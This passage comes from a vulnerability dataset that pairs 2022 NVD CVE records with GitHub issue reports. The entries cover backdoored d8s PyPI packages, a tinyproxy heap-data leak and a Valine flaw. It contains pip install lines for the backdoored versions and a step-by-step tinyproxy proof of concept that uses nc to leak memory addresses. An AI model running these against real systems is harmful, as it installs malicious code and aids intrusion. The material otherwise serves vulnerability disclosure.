"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-math/issues/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-math/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-math_project:d8s-math:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "8F0F790C-FBEC-47A1-9C7D-41F1EB7E2A79",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-math/issues/11 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-math"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using `pip install d8s-math==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI | code execution backdoor | https://api.github.com/repos/democritus-project/d8s-math/issues/11/comments | 0 | 2022-08-26T06:17:51Z | 2022-08-26T06:17:51Z | https://github.com/democritus-project/d8s-math/issues/11 | 1,351,803,702 | 11 | 4,172 |
CVE-2022-38884 | 2022-09-19T16:15:11.667 | The d8s-grammars for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-grammars/issues/6"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-grammars/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-grammars/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-grammars/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-grammars_project:d8s-grammars:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "E1B38200-A8FC-44BE-B5A9-2D773765963F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-grammars/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-grammars"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using `pip install d8s-grammars==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI | code execution backdoor | https://api.github.com/repos/democritus-project/d8s-grammars/issues/6/comments | 0 | 2022-08-26T06:41:07Z | 2022-08-26T06:41:07Z | https://github.com/democritus-project/d8s-grammars/issues/6 | 1,351,823,443 | 6 | 4,173 |
CVE-2022-38885 | 2022-09-19T16:15:11.707 | The d8s-netstrings for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-netstrings/issues/4"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-netstrings/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-netstrings/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-netstrings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-netstrings_project:d8s-netstrings:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "B861B080-43CF-44F3-8930-01FDD266AE53",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-netstrings/issues/4 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-netstrings"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using `pip install d8s-netstrings==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI
| code execution backdoor | https://api.github.com/repos/democritus-project/d8s-netstrings/issues/4/comments | 0 | 2022-08-26T06:56:50Z | 2022-08-26T06:56:50Z | https://github.com/democritus-project/d8s-netstrings/issues/4 | 1,351,836,702 | 4 | 4,174 |
CVE-2022-38886 | 2022-09-19T16:15:11.750 | The d8s-xml for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-xml/issues/10"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-xml/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-xml/issues/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-xml/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-xml_project:d8s-xml:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "1DD9E9CA-4056-4318-8D34-98621C118782",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-xml/issues/10 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-xml"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using `pip install d8s-xml==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI
| code execution backdoor | https://api.github.com/repos/democritus-project/d8s-xml/issues/10/comments | 1 | 2022-08-27T01:58:05Z | 2022-09-24T23:13:39Z | https://github.com/democritus-project/d8s-xml/issues/10 | 1,352,909,676 | 10 | 4,175 |
CVE-2022-38887 | 2022-09-19T16:15:11.793 | The d8s-python for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The democritus-strings package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-python/issues/36"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-python/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-python/issues/36"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-python/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-python_project:d8s-python:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "44EE3779-051F-4F44-A836-64BFE366536C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-python/issues/36 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-python"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using `pip install d8s-python==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI | code execution backdoor | https://api.github.com/repos/democritus-project/d8s-python/issues/36/comments | 0 | 2022-08-27T06:59:40Z | 2022-08-27T06:59:40Z | https://github.com/democritus-project/d8s-python/issues/36 | 1,352,965,984 | 36 | 4,176 |
CVE-2022-40431 | 2022-09-19T16:15:12.087 | The d8s-pdfs for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-networking package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-pdfs/issues/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-networking/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-pdfs/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-networking/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-pdfs_project:d8s-pdfs:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "17FF50DC-5EBD-47CF-9664-DB44B3608D0B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-pdfs/issues/5 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-pdfs"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-networking package. Attackers can upload democritus-networking packages containing arbitrary malicious code. For the safety of this project, the democritus-networking package has been uploaded by us.

The democritus-networking package can be successfully installed using `pip install d8s-pdfs==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI
| code execution backdoor | https://api.github.com/repos/democritus-project/d8s-pdfs/issues/5/comments | 0 | 2022-09-11T10:00:20Z | 2022-09-11T10:01:58Z | https://github.com/democritus-project/d8s-pdfs/issues/5 | 1,368,894,070 | 5 | 4,177 |
CVE-2022-40432 | 2022-09-19T16:15:12.127 | The d8s-strings for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-hypothesis package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-strings/issues/21"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-strings/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-hypothesis/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-strings/issues/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-hypothesis/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-strings_project:d8s-strings:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "D7CF89ED-B1A1-4275-8A73-D84A1A09BB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-strings/issues/21 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-strings"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-hypothesis package. Attackers can upload democritus-hypothesis packages containing arbitrary malicious code. For the safety of this project, the democritus-hypothesis package has been uploaded by us.

The democritus-hypothesis package can be successfully installed using `pip install d8s-strings==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI | code execution backdoor | https://api.github.com/repos/democritus-project/d8s-strings/issues/21/comments | 0 | 2022-09-11T13:28:18Z | 2022-10-14T00:42:03Z | https://github.com/democritus-project/d8s-strings/issues/21 | 1,368,947,158 | 21 | 4,178 |
CVE-2022-40468 | 2022-09-19T17:15:14.700 | Potential leak of left-over heap data if custom error page templates containing special non-standard variables are used. Tinyproxy commit 84f203f and earlier use uninitialized buffers in process_request() function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/issues/457"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-27"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/issues/457"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-27"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E51FD82-DAE3-49BD-A817-91A131CE6525",
"versionEndExcluding": null,
"versionEndIncluding": "1.11.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1188"
] | 1188 | https://github.com/tinyproxy/tinyproxy/issues/457 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tinyproxy",
"tinyproxy"
] | > ubuntu 22.04
> GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.
1. Clone & Compile
```
git clone https://github.com/tinyproxy/tinyproxy
cd tinyproxy
./autogen.sh
./configure
make
```
2. Create a config file
```
vi ./1.conf
Port 8888
Listen 0.0.0.0
Bind 0.0.0.0
Timeout 600
DefaultErrorFile "./default.html"
StatHost "127.0.0.1"
LogFile "./tinyproxy.log"
Syslog Off
LogLevel Info
Allow 0.0.0.0/0
ViaProxyName "tinyproxy"
```
3. Add one line to original default page
```
cp data/templates/default.html ./
sed -i '16a\<p>Url: {url}</p>' ./default.html
```
4. Start tinyproxy server
```
./src/tinyproxy -c ./1.conf -d
```
5. Send HTTP request (Without HTTP method field)
```
#!/bin/bash
echo -ne \
" http://www.baidu.com/ HTTP/1.1\r\n \
host: www.baidu.com\r\n \
User-Agent: fuck\r\n \
Accept: */*\r\n \
Proxy-Connection: Keep-Alive\r\n\r\n" \
| nc 127.0.0.1 8888 \
| grep -a "Url: " \
| hexdump -C
```
5. The "URL" line in the result prints out the address of Glibc, which may be useful for attackers to launch attacks in the future. | Potential runtime system sensitive information disclosure through special HTTP requests. | https://api.github.com/repos/tinyproxy/tinyproxy/issues/457/comments | 5 | 2022-09-08T13:25:39Z | 2024-05-05T18:20:33Z | https://github.com/tinyproxy/tinyproxy/issues/457 | 1,366,329,471 | 457 | 4,179 |
CVE-2022-40468 | 2022-09-19T17:15:14.700 | Potential leak of left-over heap data if custom error page templates containing special non-standard variables are used. Tinyproxy commit 84f203f and earlier use uninitialized buffers in process_request() function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/issues/457"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-27"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/blob/84f203fb1c4733608c7283bbe794005a469c4b00/src/reqs.c#L346"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tinyproxy/tinyproxy/issues/457"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-27"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E51FD82-DAE3-49BD-A817-91A131CE6525",
"versionEndExcluding": null,
"versionEndIncluding": "1.11.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1188"
] | 1188 | https://github.com/tinyproxy/tinyproxy/issues/457#issuecomment-1264176815 | null | github.com | [
"tinyproxy",
"tinyproxy"
] | > ubuntu 22.04
> GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.
1. Clone & Compile
```
git clone https://github.com/tinyproxy/tinyproxy
cd tinyproxy
./autogen.sh
./configure
make
```
2. Create a config file
```
vi ./1.conf
Port 8888
Listen 0.0.0.0
Bind 0.0.0.0
Timeout 600
DefaultErrorFile "./default.html"
StatHost "127.0.0.1"
LogFile "./tinyproxy.log"
Syslog Off
LogLevel Info
Allow 0.0.0.0/0
ViaProxyName "tinyproxy"
```
3. Add one line to original default page
```
cp data/templates/default.html ./
sed -i '16a\<p>Url: {url}</p>' ./default.html
```
4. Start tinyproxy server
```
./src/tinyproxy -c ./1.conf -d
```
5. Send HTTP request (Without HTTP method field)
```
#!/bin/bash
echo -ne \
" http://www.baidu.com/ HTTP/1.1\r\n \
host: www.baidu.com\r\n \
User-Agent: fuck\r\n \
Accept: */*\r\n \
Proxy-Connection: Keep-Alive\r\n\r\n" \
| nc 127.0.0.1 8888 \
| grep -a "Url: " \
| hexdump -C
```
5. The "URL" line in the result prints out the address of Glibc, which may be useful for attackers to launch attacks in the future. | Potential runtime system sensitive information disclosure through special HTTP requests. | https://api.github.com/repos/tinyproxy/tinyproxy/issues/457/comments | 5 | 2022-09-08T13:25:39Z | 2024-05-05T18:20:33Z | https://github.com/tinyproxy/tinyproxy/issues/457 | 1,366,329,471 | 457 | 4,180 |
CVE-2022-38545 | 2022-09-19T23:15:09.203 | Valine v1.4.18 was discovered to contain a remote code execution (RCE) vulnerability which allows attackers to execute arbitrary code via a crafted POST request. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xCss/Valine/issues/400"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/xCss/Valine/issues/400"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:valine.js:valine:1.4.18:*:*:*:*:*:*:*",
"matchCriteriaId": "71726106-9C57-4CCA-9A8C-34B1ACB32642",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/xCss/Valine/issues/400 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"xCss",
"Valine"
] | 如果您想报告错误,请提供以下信息 If you want to report a bug, please provide the following information:
- [x] 可复现问题的步骤 The steps to reproduce.
- [x] 可复现问题的网页地址 A minimal demo of the problem via https://jsfiddle.net or http://codepen.io/pen if possible.
